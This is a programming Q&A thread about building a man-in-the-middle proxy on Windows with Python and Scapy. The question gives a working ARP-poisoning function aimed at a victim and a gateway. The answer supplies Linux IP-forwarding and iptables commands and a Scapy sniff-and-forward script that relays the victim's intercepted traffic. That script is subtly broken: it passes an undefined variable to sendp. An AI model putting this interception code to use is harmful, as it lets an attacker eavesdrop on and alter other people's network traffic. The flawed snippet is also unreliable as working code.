# packet forwarding while ARP poisoning [in Windows]

Tags: python, scapy, packet, arp

I wanted to make a "proxy" while ARP poisoning, it works with UDP and if I send a pkt to google I see it on my pc using wireshark

```
def trick(gate_mac, victim_mac):
    '''Tricks the victim and the gate_way, using arp'''
    my_mac=ARP()
    my_mac=my_mac.hwsrc
    sendp(Ether(dst=ETHER_BROADCAST)/ARP(pdst= victim_ip, psrc = gate_ip, hwdst= victim_mac))
    sendp(Ether(dst=ETHER_BROADCAST)/ARP(pdst= gate_ip, psrc = victim_ip, hwdst= my_mac))
    print "TRICKED"
```

that is the function i wrote to arp poison, now I want to send all the packets I get from the victim's pc to the router/
but I have no clue how to do packet forwarding.

Answer (score 1):

You can simply activate your OS packet forwarding. If you're running Linux, a simple `sysctl -w net.ipv4.ip_forward=1` should do that.

You may also need to let the packets pass your firewall;something like `iptables -A FORWARD -s victim_ip -j ACCEPT; iptables -A FORWARD -d victim_ip -j ACCEPT` should work (if you're using Linux, again).

Under other OSes, you need to find out how to enable packet forwarding and if needed add firewall rules. If you cannot enable packet forwarding, you can run another Scapy script to forward packets for you. Here is an example:

```
VICTIM_MAC = "00:01:23:45:67:89"
GATEWAY_MAC = "00:98:76:54:32:10"
_SRC_DST = {
    GATEWAY_MAC: VICTIM_MAC,
    VICTIM_MAC: GATEWAY_MAC,
}

def forward_pkt(pkt):
    pkt[Ether].dst = _SRC_DST.get(pkt[Ether].src, GATEWAY_MAC)
    sendp(dst)

sniff(
    prn=forward_pkt,
    filter="ip and (ether src %s or ether src %s)" % (VICTIM_MAC,
                                                      GATEWAY_MAC)
)
```

Comment: Im actully using windows, the code I wrote runs on python using scapy, so i have no idea how to enable packet forwarding on other OSes